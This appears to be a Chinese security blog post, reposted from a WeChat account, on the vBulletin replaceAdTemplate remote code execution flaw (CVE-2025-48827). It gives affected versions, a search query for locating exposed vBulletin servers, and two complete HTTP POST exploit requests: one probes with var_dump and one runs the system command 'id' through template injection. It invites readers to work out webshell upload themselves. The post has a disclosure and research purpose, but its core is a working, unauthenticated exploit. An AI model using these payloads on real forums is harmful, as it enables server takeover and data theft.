字数 284,阅读大约需 2 分钟
vBulletin介绍
vBulletin 是一个强大、灵活且可高度定制的商业论坛程序,广泛用于创建用户友好的论坛网站。它使用 PHP 脚本语言编写,并基于 MySQL 数据库,这使得它在性能和速度方面表现出色。
漏洞介绍
漏洞编号CVE-2025-48827,vBulletin replaceAdTemplat 远程代码执行漏洞,攻击者可构造恶意请求在无需登录的情况下执行任意代码控制服务器。
漏洞版本
vBulletin 5.0.0 – 5.7.5vBulletin 6.0.0 – 6.0.3
搜索语法
app="vBulletin"
漏洞复现
验证POC
POST/HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 134routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location=rand_string&template=<vb:if condition='"var_dump"("rand_value")'></vb:if>
命令执行POC
POST/HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 134routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location=test&template=<vb:if condition='"system"("id")'></vb:if>
写入WebShell
留给大家的作业,自己学习一下吧
灵魂发问
大家公司是不是都会有那么一个一天天不干人事的心机婊呢 ?欢迎留言交流。
原文始发于微信公众号(南街老友):vBulletin replaceAdTemplate 远程代码执行漏洞(CVE-2025-48827)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论